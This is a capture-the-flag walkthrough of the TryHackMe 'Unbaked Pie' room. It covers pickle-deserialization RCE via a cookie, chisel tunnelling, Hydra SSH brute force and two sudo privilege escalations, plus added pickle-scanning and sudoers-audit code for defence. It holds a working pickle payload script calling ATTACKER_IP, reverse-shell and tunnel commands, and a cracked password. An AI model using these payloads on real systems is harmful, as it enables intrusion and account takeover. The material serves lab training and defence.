Description
Don’t over-baked your pie!
https://tryhackme.com/room/unbakedpie
Port scanning
Nmap port scanning reveals only one open port: 5003
Main website
On the main website we can see some cooking recipes. The photo of pickles is a hint 🙂
Cookie
When we use the search form, we can see that the phrase we searched for is base64-encoded and stored as a cookie value.
Deserialization of pickle → RCE
The header reveals that we are dealing with a Python application.
When we try to access /admin, we see information about the server leaked because debug mode is enabled.
Pickle is a Python module for serializing (pickling) Python objects into a byte stream and deserializing (unpickling) them back. If an application unpickles user-controlled input, an attacker can craft a payload whose deserialization executes arbitrary code (remote code execution).
To check whether RCE through deserialization is possible, I prepared a Python script that pickles (serializes) the command and base64-encodes the result:

    import pickle
    import base64
    import os

    class RCE:
        # pickle calls __reduce__ to learn how to rebuild the object;
        # returning (os.system, (cmd,)) makes unpickling run the command
        def __reduce__(self):
            cmd = 'ping -c 3 ATTACKER_IP'
            return os.system, (cmd,)

    if __name__ == '__main__':
        pickled = pickle.dumps(RCE())
        print(base64.urlsafe_b64encode(pickled))

I used tcpdump to watch for incoming ping traffic on tun0.
I set the base64 value generated by the Python script as the search_cookie value and refreshed the page.
Below, we can see that we can execute a command on the server.
Now that we know ping is working, we can craft a reverse shell command and put it into the search_cookie value.
I prepared a payload using the same script, but with a reverse shell command, and started a listener on port 1235. I changed the cookie value and, after a while, I got a reverse shell.
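The deserialization flaw exploited above comes down to one thing: the application hands a user-supplied byte stream to pickle, which will import and call whatever the stream names. The script below is an added example (not part of this writeup or of the room) showing the defender's side: a static scan of a cookie's pickle opcodes with pickletools, an allow-list unpickler in the pattern from the Python documentation, and the actual fix of storing the search term as JSON instead of a pickle. The Gadget class and the "pickles" search term are constructed samples; Gadget uses the same __reduce__ trick as the page's RCE class but points at the harmless os.getcwd so the demo never runs a command.

```python
import base64
import builtins
import io
import json
import os
import pickle
import pickletools

# Pickle opcodes that can import a callable or call one while loading.
# A cookie that only carries a search string never needs any of these.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                     "NEWOBJ", "NEWOBJ_EX", "BUILD"}


class Gadget:
    """Constructed sample: the page's __reduce__ trick, but pointing at the
    harmless os.getcwd instead of os.system."""
    def __reduce__(self):
        return os.getcwd, ()


def gadget_pickle() -> bytes:
    return pickle.dumps(Gadget())


def benign_pickle() -> bytes:
    # All the application really needs to remember: one search term (constructed).
    return pickle.dumps("pickles")


def to_cookie(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def dangerous_opcodes(data: bytes) -> set:
    """Disassemble a pickle stream without loading it and report risky opcodes.
    pickletools.genops only parses; nothing is imported or executed."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in DANGEROUS_OPCODES}


SAFE_BUILTINS = {"str", "int", "float", "bool", "list", "dict", "tuple", "set"}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: any global lookup outside a few harmless builtins
    is refused, so a reference to os.system never resolves."""
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_load_or_none(data: bytes):
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return None


def load_cookie(cookie: str):
    """Defence in depth: cheap static scan first (easy to log and alert on),
    then the restricted unpickler. Returns None when the cookie is refused."""
    data = base64.urlsafe_b64decode(cookie)
    if dangerous_opcodes(data):
        return None
    return restricted_load_or_none(data)


# The real fix: do not pickle user input at all. JSON carries data, not code.
def encode_search_cookie(term: str) -> str:
    return to_cookie(json.dumps(term).encode())


def decode_search_cookie(cookie: str) -> str:
    value = json.loads(base64.urlsafe_b64decode(cookie))
    if not isinstance(value, str):
        raise ValueError("search cookie must hold a single string")
    return value


if __name__ == "__main__":
    print("benign:", dangerous_opcodes(benign_pickle()),
          load_cookie(to_cookie(benign_pickle())))
    print("gadget:", dangerous_opcodes(gadget_pickle()),
          load_cookie(to_cookie(gadget_pickle())))
```

The static scan is useful on its own as a detection signal: a search cookie that contains REDUCE or STACK_GLOBAL is never legitimate traffic, and logging those hits tells you someone is probing the deserialization path. The restricted unpickler is only a fallback for code that cannot yet be migrated off pickle; the JSON helpers are what the application should have used from the start.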
Enumerating the host
The id command shows that we are running as root, but inside a container. I used linpeas.sh to enumerate the host. Below, we can see that there are other hosts on the same network (we are at 172.17.0.2).
In the bash history we can see that someone tried to connect via ssh as user ramsey, and also that the openssh package was removed.
Port forwarding – chisel
As I can't use ssh on the target machine, I used the chisel tool to forward ports.
First I started the chisel server on my machine:

    chisel server -p 9000 --reverse

Next, on the target machine, I ran the chisel client so that 172.17.0.1:22 becomes reachable on my machine at 127.0.0.1:9001 through the connection to ATTACKER_IP:9000:

    # commands to run on the target machine after chisel is downloaded
    chmod +x chisel_1.10.1_linux_amd64
    ./chisel_1.10.1_linux_amd64 client ATTACKER_IP:9000 R:127.0.0.1:9001:172.17.0.1:22

Brute force ssh using Hydra
As I didn't know ramsey's password, I used hydra with the rockyou.txt wordlist to brute-force it:
ramsey → oliver
I checked which commands ramsey can run with sudo.
Since ramsey can run the vuln.py script as oliver, I replaced vuln.py with my own vuln.py:

    mv vuln.py vuln.py.backup
    vim vuln.py

I started a listener on my Kali machine:

    nc -nlvp 4446

and on the target machine I executed the script:

    sudo -u oliver /usr/bin/python /home/ramsey/vuln.py

After a while, I had a reverse shell connected as oliver.
oliver → root
I checked which commands oliver can run, and it looks like he can set environment variables and run dockerScript.py.
I noticed that dockerScript.py imports the docker library:
In /dev/shm I created docker.py containing a reverse shell; it will stand in for the docker library once the PYTHONPATH variable points to /dev/shm.
I started a listener on my Kali machine on port 4447 (nc -nlvp 4447) and executed a command on the target machine:
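Both privilege escalations in this box rest on sudo rules that are easy to spot in an audit: a rule that runs a script the invoking user can replace (ramsey's own vuln.py), and a rule tagged SETENV that lets the caller redirect PYTHONPATH at a Python script (dockerScript.py). The checker below is an added example, not code from the writeup or the room. The page does not show the real sudoers entries, so the CONSTRUCTED_SUDOERS lines are made up to match what the text describes; /opt/dockerScript.py and the alice rule are assumed values used only to exercise the checks.

```python
import os
import re
from typing import List

# Constructed sudoers lines matching what the writeup describes. The real
# entries are not on the page; /opt/dockerScript.py is an assumed location.
CONSTRUCTED_SUDOERS = """\
Defaults env_reset
ramsey ALL=(oliver) NOPASSWD: /usr/bin/python /home/ramsey/vuln.py
oliver ALL=(root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# user host=(runas) [TAG: ...] command
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>.+?)\s*$"
)
# Defaults env_keep += "VAR ..."
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^"]+)"?')

# Directories any local user can write to; a script there can be swapped out.
WRITABLE_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/")


def audit_sudoers(text: str) -> List[str]:
    """Return one human-readable finding per weak rule in a sudoers fragment."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Defaults"):
            m = ENV_KEEP_RE.search(line)
            if m and "PYTHONPATH" in m.group(1).split():
                findings.append("Defaults env_keep preserves PYTHONPATH across sudo")
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, runas, command = m["user"], m["runas"], m["command"]
        tags = {t.rstrip(":") for t in m["tags"].split()}
        argv = command.split()
        interpreter = os.path.basename(argv[0])
        script = argv[1] if len(argv) > 1 else None
        # SETENV on a Python command: the caller controls PYTHONPATH, so any
        # module the script imports can be shadowed (the docker.py trick).
        if "SETENV" in tags and interpreter.startswith("python"):
            findings.append(
                f"{user} -> {runas}: SETENV lets the caller set PYTHONPATH for {command}")
        # Script in the caller's home or a world-writable directory: the
        # caller can replace it before sudo runs it (the vuln.py trick).
        if script and (script.startswith(f"/home/{user}/")
                       or script.startswith(WRITABLE_PREFIXES)):
            findings.append(
                f"{user} -> {runas}: {script} is in a location {user} can overwrite")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(CONSTRUCTED_SUDOERS):
        print(finding)
```

The remediation for both findings is the same shape: keep scripts invoked through sudo owned by root in a root-owned directory, and drop SETENV (and any env_keep entry for PYTHONPATH) so sudo's default env_reset applies. The parser handles the common single-line rule form only; real sudoers files with aliases or line continuations need the full grammar.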